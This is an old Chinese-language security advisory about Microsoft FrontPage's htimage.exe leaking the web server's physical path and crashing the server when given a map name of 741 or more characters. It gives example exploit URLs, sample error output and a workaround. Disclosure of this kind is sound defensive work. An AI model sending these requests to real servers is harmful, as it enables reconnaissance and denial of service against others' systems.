微软 Frontpage 中的htimage.exe泄漏Web服务器路径
发布日期:2000-04-21
更新日期:2000-04-21
受影响系统:
Microsoft FrontPage 98 Server
Extensions for PWS
Microsoft FrontPage Personal
WebServer 1.0 + Microsoft FrontPage 98.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0 + Microsoft FrontPage 97.0
+ Microsoft FrontPage 1.1
描述:
htimage.exe 包含了 Frontpage 映象热点功能,进行普通操作时,
他传递一个地图名称和指定一个对应的热点在:
http: file://target/path/htimage.exe/mapname?x,y
如果输入一个不存在的mapname,htimage将返回一个出错信息,其中
将包含WebServer root的真实物理路径.
如果地图名长度超过了 741 或更多字节,将产生一个无效页面错误,
webserver 就会当掉,但此时操作系统仍会继续工作。
<* 来源: Narrow<narrow@hobbiton.org> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1. 泄漏物理路经:
http://server/cgi-bin/htimage.exe/linux?0,0
如果linux并不是个真实存在的mapname,那么可能得到下列类似信息:
------------------------------------------------------------------------------------
Error
Error calling HTImage:
Picture config file not found, tried the following:
c:/interpub/webroot/linux/linux
------------------------------------------------------------------------------------
2. 当掉 server:
http: file://server/cgi-bin/htimage.exe/<741+characters>?0,0
建议:
临时解决办法: 删掉 htimage.exe
浏览次数:6930
严重程度:0(网友投票)
